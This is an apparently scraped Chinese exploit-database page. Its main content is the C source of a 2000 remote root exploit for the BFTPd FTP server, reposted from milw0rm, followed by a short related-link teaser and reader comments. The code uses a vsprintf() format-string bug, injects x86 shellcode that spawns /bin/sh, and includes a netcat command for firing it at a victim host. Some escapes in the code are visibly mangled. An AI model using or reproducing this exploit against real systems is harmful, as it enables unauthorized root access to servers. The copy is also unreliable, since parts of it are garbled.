BFTPd – ‘vsprintf()’ Format Strings
漏洞ID | 1053491 | 漏洞类型 | |
发布时间 | 2000-11-29 | 更新时间 | 2000-11-29 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
* Copyright (c) 2000 - Security.is
*
* The following material may be freely redistributed, provided
* that the code or the disclaimer have not been partly removed,
* altered or modified in any way. The material is the property
* of security.is. You are allowed to adopt the represented code
* in your programs, given that you give credits where it's due.
*
* A no-name ftp-server has a serious bug which leads to remote root.
* Anyway, we exploit vsprintf() via format-string.
*
* Discovered/coded by: DiGiT - [email protected]
* Greets: security.is, ADM
* note: Coded during security.is weekend ;>
*
* Run like: (./bftpexp ; cat) | nc bftpd.victim.com 21
* offset is optional and is arg1
*
*/
#include <stdio.h>
char shellcode[] =
"x31xc0x31xdbx04x0bxcdx80x31xc0x40x40xcdx80x85"
"xc0x75x28x89xd9x31xc0x41x04x3fxcdx80x31xc0x04"
"x3fx41xebx1fx31xc0x5fx89x7fx08x88x47x07x89x47"
"x0cx89xfbx8dx4fx08x8dx57x0cx04x0bxcdx80x31xc0"
"x31xdbx40xcdx80xe8xdcxffxffxff/bin/sh";
#define ADDR 0xbffff83c
int main(int argc, char *argv[])
{
char lenbuf[1024],nopbuf[256], addrbuf[32], buf[256];
int offset=0,length, nopcount=100,i;
long nop_addr = ADDR;
if(argc > 1)
offset = atoi(argv[1]);
memset (nopbuf, 'x90', nopcount);
nop_addr = nop_addr + offset;
strcpy(buf, nopbuf);
strcat(buf, shellcode);
length=1024-strlen(shellcode)-nopcount+4-14;
strcat(buf, "%.");
sprintf(lenbuf, "%dd", length);
strcat(buf, lenbuf);
sprintf(addrbuf, "%c%c%c%c",
(unsigned char) ((nop_addr >> 0) & 0xff),
(unsigned char) ((nop_addr >> 8) & 0xff),
(unsigned char) ((nop_addr >> 16) & 0xff),
(unsigned char) ((nop_addr >> 24) & 0xff));
for(i = 0 ; i < 4 ; i++)
strcat(buf, addrbuf);
fprintf(stderr, "Bftpd remote exploit, by DiGiTn");
fprintf(stderr, "Using Address = 0x%xn", nop_addr);
printf("%sn", buf);
return 0;
}
// milw0rm.com [2000-11-29]
相关推荐: Novell GroupWise 5.5 Enhancement Pack DoS Vulnerability
Novell GroupWise 5.5 Enhancement Pack DoS Vulnerability 漏洞ID 1104400 漏洞类型 Boundary Condition Error 发布时间 2000-02-07 更新时间 2000-02-07…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666